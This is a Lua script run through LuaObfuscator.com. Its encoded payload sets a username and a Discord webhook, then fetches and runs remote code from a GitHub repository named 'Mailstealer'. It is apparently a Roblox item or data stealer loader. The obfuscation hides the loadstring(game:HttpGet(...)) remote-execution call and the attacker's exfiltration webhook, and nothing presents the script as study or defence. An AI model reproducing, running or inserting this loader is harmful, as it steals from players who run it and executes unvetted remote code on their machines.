--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v77=v5(v68,v19);v19=nil;return v77;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((5 -3)^(v32-(2 -1))))%((3 -(1 + 0))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + 1)) ;return v69-(v69%(932 -(857 + 74))) ;else local v70=(879 -(282 + 595))^(v32-(569 -(367 + 201))) ;return (((v31%(v70 + v70))>=v70) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37=1065 -(68 + 997) ;local v38;local v39;local v40;local v41;while true do if (v37==(1271 -(226 + 1044))) then return (v41 * (40022563 -23245347)) + (v40 * 65536) + (v39 * (1114 -858)) + v38 ;end if (v37==(117 -(32 + 85))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (1 -0) + 3 ;v37=958 -(892 + 65) ;end end end local function v24()local v42=(1486 -(998 + 488)) -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(353 -(87 + 263))) then if (v47==((58 + 122) -(67 + 113))) then if (v46==((0 -0) + 0)) then return v48 * ((0 + 0) -0) ;else v47=1 + 0 ;v45=0 -(772 -(201 + 571)) ;end elseif (v47==(2999 -(802 + 150))) then return ((v46==((1138 -(116 + 1022)) -0)) and (v48 * ((1 -0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(2020 -(915 + 82)) ) * (v45 + (v46/((5 -3)^((128 -97) + 21)))) ;end if (v42==((438 -(145 + 293)) -0)) then v43=v23();v44=v23();v42=1;end if (v42==(1189 -(1069 + 118))) then v47=v20(v44,(28 + 19) -26 ,(497 -(44 + 386)) -36 );v48=((v20(v44,6 + 26 )==((3 -2) -0)) and  -(1 + 0)) or (792 -(368 + 423)) ;v42=9 -6 ;end if (v42==1) then v45=(67 -48) -(10 + 8) ;v46=(v20(v44,3 -2 ,462 -(416 + 26) ) * ((6 -4)^32)) + v43 ;v42=1 + 1 ;end end end local function v25(v49)local v50=0;local v51;local v52;while true do if (v50==3) then return v6(v52);end if (v50==(861 -(814 + 45))) then v52={};for v78=2 -1 , #v51 do v52[v78]=v2(v1(v3(v51,v78,v78)));end v50=1 + 2 ;end if (v50==(0 + 0)) then v51=nil;if  not v49 then local v95=885 -((884 -623) + 624) ;while true do if (v95==(0 -0)) then v49=v23();if (v49==((5113 -4033) -(1020 + 60))) then return "";end break;end end end v50=1;end if (v50==1) then v51=v3(v16,v18,(v18 + v49) -(1424 -(630 + 793)) );v18=v18 + v49 ;v50=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==(1470 -(899 + 568))) then v60=nil;while true do local v80=0 + 0 ;while true do if (v80==0) then if (2~=v54) then else local v104=0 -0 ;while true do if (v104==0) then local v107=0;while true do if (v107~=0) then else for v139=604 -(268 + 335) ,v23() do local v140=0;local v141;local v142;local v143;local v144;while true do if ((291 -(60 + 230))==v140) then v143=nil;v144=nil;v140=574 -(426 + 146) ;end if (v140~=(0 + 0)) then else v141=1456 -(282 + 1174) ;v142=nil;v140=1;end if (2~=v140) then else while true do if (v141~=0) then else local v180=0;while true do if (v180~=(812 -(569 + 242))) then else v141=2 -1 ;break;end if (v180~=0) then else v142=0 + 0 ;v143=nil;v180=1025 -(706 + 318) ;end end end if (1~=v141) then else v144=nil;while true do if ((1252 -(721 + 530))==v142) then while true do if (0==v143) then v144=v21();if (v20(v144,1,1272 -(945 + 326) )==0) then local v182=0 -0 ;local v183;local v184;local v185;local v186;while true do if (v182==0) then local v187=0;while true do if (v187==(1 + 0)) then v182=1;break;end if (v187==0) then v183=0;v184=nil;v187=701 -(271 + 429) ;end end end if (v182~=1) then else local v188=0;while true do if (v188~=(0 + 0)) then else v185=nil;v186=nil;v188=1501 -(1408 + 92) ;end if (v188==1) then v182=1088 -(461 + 625) ;break;end end end if (v182~=(1290 -(993 + 295))) then else while true do if (v183~=1) then else local v189=0 + 0 ;local v190;local v191;while true do if ((1171 -(418 + 753))==v189) then v190=0;v191=nil;v189=1;end if (v189==(1 + 0)) then while true do if ((0 + 0)==v190) then v191=0;while true do if (v191~=(1 + 0)) then else v183=1 + 1 ;break;end if (v191~=0) then else local v202=0;local v203;while true do if (0~=v202) then else v203=529 -(406 + 123) ;while true do if (v203~=(1770 -(1749 + 20))) then else v191=1 + 0 ;break;end if (v203~=0) then else local v205=0;while true do if ((1322 -(1249 + 73))~=v205) then else v186={v22(),v22(),nil,nil};if (v184==(0 -0)) then local v210=1900 -(106 + 1794) ;while true do if (v210~=0) then else v186[1 + 2 ]=v22();v186[2 + 2 ]=v22();break;end end elseif (v184==(2 -1)) then v186[7 -4 ]=v23();elseif (v184==(116 -(4 + 110))) then v186[587 -(57 + 527) ]=v23() -((1429 -(41 + 1386))^16) ;elseif (v184~=(106 -(17 + 86))) then else local v215=0;local v216;local v217;local v218;while true do if (v215==1) then v218=nil;while true do if (1==v216) then while true do if ((0 + 0)~=v217) then else v218=0;while true do if (v218==(0 -0)) then v186[8 -5 ]=v23() -(2^(182 -(122 + 44))) ;v186[4]=v22();break;end end break;end end break;end if (v216==0) then v217=0;v218=nil;v216=1;end end break;end if (v215~=0) then else v216=0 -0 ;v217=nil;v215=3 -2 ;end end end v205=1;end if (v205==(1 + 0)) then v203=1 + 0 ;break;end end end end break;end end end end break;end end break;end end end if (v183==2) then local v192=0 -0 ;local v193;while true do if (v192==(65 -(30 + 35))) then v193=0;while true do if (v193~=1) then else v183=3 + 0 ;break;end if (v193~=(1257 -(1043 + 214))) then else local v200=0 -0 ;local v201;while true do if (v200==0) then v201=0;while true do if (v201~=1) then else v193=1213 -(323 + 889) ;break;end if (0~=v201) then else local v204=0;while true do if ((2 -1)==v204) then v201=1;break;end if (v204~=0) then else if (v20(v185,1,1)~=1) then else v186[582 -(361 + 219) ]=v60[v186[322 -(53 + 267) ]];end if (v20(v185,2,1 + 1 )~=1) then else v186[3]=v60[v186[3]];end v204=414 -(15 + 398) ;end end end end break;end end end end break;end end end if (v183~=(985 -(18 + 964))) then else if (v20(v185,11 -8 ,2 + 1 )==(1 + 0)) then v186[854 -(20 + 830) ]=v60[v186[4 + 0 ]];end v55[v139]=v186;break;end if (v183==(126 -(116 + 10))) then local v195=0 + 0 ;local v196;local v197;while true do if (v195==(739 -(542 + 196))) then while true do if (v196==(0 -0)) then v197=0 + 0 ;while true do if (1~=v197) then else v183=1;break;end if (v197~=0) then else v184=v20(v144,2 + 0 ,3);v185=v20(v144,2 + 2 ,15 -9 );v197=1;end end break;end end break;end if (v195==0) then v196=0;v197=nil;v195=2 -1 ;end end end end break;end end end break;end end break;end if (v142~=0) then else local v181=0;while true do if (v181==(1552 -(1126 + 425))) then v142=406 -(118 + 287) ;break;end if (v181==(0 -0)) then v143=1121 -(118 + 1003) ;v144=nil;v181=1;end end end end break;end end break;end end end for v145=1,v23() do v56[v145-1 ]=v28();end v107=1;end if (v107~=(2 -1)) then else v104=1;break;end end end if (v104~=(378 -(142 + 235))) then else return v58;end end end if (v54~=(0 -0)) then else local v105=0 + 0 ;while true do if (v105~=2) then else v54=978 -(553 + 424) ;break;end if (v105==1) then v57={};v58={v55,v56,nil,v57};v105=2;end if (v105==(0 + 0)) then v55={};v56={};v105=1 + 0 ;end end end v80=1 + 0 ;end if ((2 -1)~=v80) then else if (v54~=1) then else local v106=0 -0 ;while true do if ((0 -0)~=v106) then else v59=v23();v60={};v106=1;end if (v106~=1) then else for v109=1,v59 do local v110=0;local v111;local v112;local v113;while true do if (v110~=1) then else v113=nil;while true do if (v111~=(0 + 0)) then else local v172=0;while true do if (v172==(4 -3)) then v111=754 -(239 + 514) ;break;end if (v172~=0) then else v112=v21();v113=nil;v172=1;end end end if (v111==(1 + 0)) then if (v112==(1330 -(797 + 532))) then v113=v21()~=(0 + 0) ;elseif (v112==2) then v113=v24();elseif (v112~=3) then else v113=v25();end v60[v109]=v113;break;end end break;end if (v110~=0) then else v111=0;v112=nil;v110=1 + 0 ;end end end v58[6 -3 ]=v21();v106=2;end if (v106==(1204 -(373 + 829))) then v54=733 -(476 + 255) ;break;end end end break;end end end break;end if (1==v53) then local v71=1130 -(369 + 761) ;while true do if (v71~=(0 + 0)) then else v56=nil;v57=nil;v71=1;end if (v71==(1 -0)) then v53=2;break;end end end if (v53==2) then local v72=0 -0 ;while true do if (1~=v72) then else v53=3;break;end if (v72==0) then v58=nil;v59=nil;v72=239 -(64 + 174) ;end end end if (0~=v53) then else local v73=0 + 0 ;while true do if (v73==(0 -0)) then v54=0;v55=nil;v73=1;end if (v73==(337 -(144 + 192))) then v53=217 -(42 + 174) ;break;end end end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v81=v65;local v82=v66;local v83=v67;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v96=0,v89 do if (v96>=v83) then v87[v96-v83 ]=v88[v96 + 1 ];else v91[v96]=v88[v96 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v97=0;while true do if (v97==1) then if (v94<=5) then if (v94<=2) then if (v94<=0) then local v114;local v115,v116;local v117;local v118;v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v63;else v91[v93[2]]=v63[v93[3]];end v85=v85 + 1 ;v93=v81[v85];if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v63;else v91[v93[2]]=v63[v93[3]];end v85=v85 + 1 ;v93=v81[v85];v118=v93[2];v117=v91[v93[3]];v91[v118 + 1 ]=v117;v91[v118]=v117[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v118=v93[2];v115,v116=v84(v91[v118](v13(v91,v118 + 1 ,v93[3])));v86=(v116 + v118) -1 ;v114=0;for v137=v118,v86 do local v138=0;while true do if (v138==0) then v114=v114 + 1 ;v91[v137]=v115[v114];break;end end end v85=v85 + 1 ;v93=v81[v85];v118=v93[2];v91[v118]=v91[v118](v13(v91,v118 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v85=v93[3];elseif (v94==1) then do return;end else local v153=0;local v154;local v155;local v156;local v157;while true do if (v153==2) then for v177=v154,v86 do v157=v157 + 1 ;v91[v177]=v155[v157];end break;end if (v153==0) then v154=v93[2];v155,v156=v84(v91[v154](v13(v91,v154 + 1 ,v93[3])));v153=1;end if (v153==1) then v86=(v156 + v154) -1 ;v157=0;v153=2;end end end elseif (v94<=3) then v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v85=v93[3];elseif (v94>4) then v91[v93[2]]=v93[3]~=0 ;else local v159=0;local v160;while true do if (0==v159) then v160=v93[2];v91[v160]=v91[v160](v13(v91,v160 + 1 ,v86));break;end end end elseif (v94<=8) then if (v94<=6) then local v132=v93[2];local v133=v91[v93[3]];v91[v132 + 1 ]=v133;v91[v132]=v133[v93[4]];elseif (v94==7) then v85=v93[3];elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=10) then if (v94>9) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v63;else v91[v93[2]]=v63[v93[3]];end else v91[v93[2]]();end elseif (v94>11) then v63[v93[3]]=v91[v93[2]];else v91[v93[2]]=v93[3];end v85=v85 + 1 ;break;end if (v97==0) then v93=v81[v85];v94=v93[1];v97=1;end end end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D65030F3O0050616E646F7261734163746F72653303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313930372O362O3732312O393039363435332F714E796D58613661377A714F524F77523851786A6431664358625234644C2D427055524D75546177445834446D57507A6F7A6633536463345974525A6B472O347035624500163O00120B3O00013O0026083O000D000100020004073O000D00012O0005000100013O00122O000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026083O0001000100010004073O0001000100120B000100093O001203000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00013O00017O00",v9(),...);
